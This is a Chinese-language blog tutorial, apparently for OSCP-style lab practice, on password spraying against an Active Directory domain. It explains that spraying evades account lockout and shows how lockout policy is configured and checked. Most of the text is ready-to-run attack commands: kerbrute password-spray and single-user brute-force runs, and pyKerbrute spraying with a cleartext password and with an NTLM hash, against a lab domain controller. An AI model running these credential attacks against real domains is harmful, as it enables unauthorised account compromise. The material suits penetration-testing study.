域渗透-域内密码喷洒

域内密码喷洒

密码喷洒配合用户枚举使用,先进行枚举再进行喷洒

为什么不爆破,而是喷洒:

规避账户锁定策略

学习怎么设置密码锁定策略:

在工具找到组策略管理,在域下的Default Domain右键点击编辑

在这里插入图片描述
在这里插入图片描述

在计算机配置=>Windows设置=>安全设置=>账户策略=>账户锁定策略 下可以设置账户锁定的阈值

同时在密码策略也可以修改密码复杂度等

在这里插入图片描述

查看锁定阈值:

可以用命令查看

net accounts /domain

在这里插入图片描述

密码喷洒:

./kerbrute_linux_386 passwordspray --dc 192.168.10.3 -d oscp.com user.txt ty@123456

在这里插入图片描述

若不存在密码锁定策略可针对单个用户进行爆破

./kerbrute_linux_386 bruteuser --dc 192.168.10.3 -d oscp.com pass.txt ty

在这里插入图片描述

相比kerbrute工具pyKerbrute除了可以使用明文密码,还可以使用hash进行喷洒

直接使用报错ImportError: No module named Crypto.Cipher,尝试了很多办法,kali自带的是2.7版本的python,各种报错用_crypto下的hashlib还不支持MD4,最后终于找到办法

首先在我的kali上没有pip2,先进行安装

curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
python2 get-pip.py

然后需要安装库

pip2 install pycryptodome

#如果遇到什么报错,可能需要安装下这个
pip2 install setuptools

之后改代码,将Crypto.Cipher改为Crypto.Hash,完成后可以成功运行

在这里插入图片描述

python2 ADPwdSpray.py 192.168.10.3 oscp.com ../user.txt clearpassword ty@123456 tcp
python2 ADPwdSpray.py 192.168.10.3 oscp.com ../user.txt clearpassword ty@123456 udp

在这里插入图片描述

执着的安装这个pyKerbrute,就是因为他可以用hash进行喷洒

ty@123456的NTLMHash:9f2e2c0fc137d6bdb96526d605a804b2

在这里插入图片描述

python2 ADPwdSpray.py 192.168.10.3 oscp.com ../user.txt ntlmhash 9f2e2c0fc137d6bdb96526d605a804b2 tcp

python2 ADPwdSpray.py 192.168.10.3 oscp.com ../user.txt ntlmhash 9f2e2c0fc137d6bdb96526d605a804b2 udp

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值